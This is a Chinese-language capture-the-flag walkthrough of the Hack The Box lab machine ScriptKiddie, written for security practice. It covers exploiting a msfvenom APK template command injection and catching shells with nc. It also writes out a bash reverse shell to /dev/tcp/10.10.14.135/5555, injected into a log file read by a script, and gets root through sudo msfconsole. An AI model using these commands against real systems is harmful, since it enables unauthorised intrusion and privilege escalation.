Hackthebox - ScriptKiddie

Hackthebox-ScriptKiddie靶场实战

靶场信息

靶场类型

信息搜集

先使用nmap进行最基本的端口扫描

nmap -A -sS -sV -sC 10.10.10.226

发现开启了22端口和5000端口,再次基于能不爆破就不爆破的原则,我们直接看5000端口

5000端口上运行了Werkzeug,通过google搜索发现Werkzeug存在Werkzeg debug shell漏洞,但对比了下版本不适用,那就只能先访问5000端口看看具体情况了

这是一个继承了nmap、msfvenom、searchsploit工具的一个小黑客工具?那就先尝试一下他的工具吧。使用nmap扫描一下本地端口

我们获得的信息有nmap版本为7.80

尝试搜索漏洞

通过google和exploit-db均未发现可getshell的漏洞,放弃该思路

漏洞利用

我们把目光放到第二个工具msfvenom上

搜索venom发现了一个APK模板命令注入漏洞

将exploit-db上的exp给下载下来并进行修改

然后执行该EXP

获得了evil.apk文件,在本地监听443端口后将该文件上传

能弹回来,但shell似乎有问题,我们直接使用msf来生成,免去麻烦

首先运行msf然后

use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection来载入exp

设置好ip和端口后输入exploit执行

获得脚本/root/.msf4/local/msf.apk

然后本地使用nc监听4444端口

Nc –nvlp 4444

使用5000端口上的第二个脚本进行上传

成功反弹回一个shell,我们执行以下命令获得一个稳定的shell

SHELL=/bin/bash script -q /dev/null

在根目录下我们成功取得普通用户的flag

权限提升

进入home目录,发现除了我们使用的kid用户以外,还有一个pwn用户

进入目录并查看文件

发现有一个scanlosers.sh脚本

我们查看一下脚本内容

该脚本会一直扫描/home/kid/logs/hackers的目录文件的IP地址

该脚本未对hackers文件传入的内容做过滤,并且我们使用的kid用户也有对该文件的编辑权限,我们直接写入一个命令执行,来让他把pwn用户的权限反弹给我们

我们本地监听一个新的端口5555

Nc –nvlp 5555

先切换到logs目录

Cd logs

然后写入恶意代码

echo “ ;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.135/5555 0>&1’ #” >> hackers

直接使用echo输入,或是手动编辑均可,只要能把命令写入进去即可

写入成功,并成功反弹回pwn用户的shell

使用sudo -l检查一下pwn用户的权限

发现pwn用户拥有msf的权限,且不需要root密码,直接进入msf调用root权限

sudo /opt/metasploit-framework-6.0.9/msfconsole

成功使用root权限进入msf,此时咱们已经拥有root权限,直接进入root目录拿root用户的flag即可

成功拿下root权限的flag

收工睡觉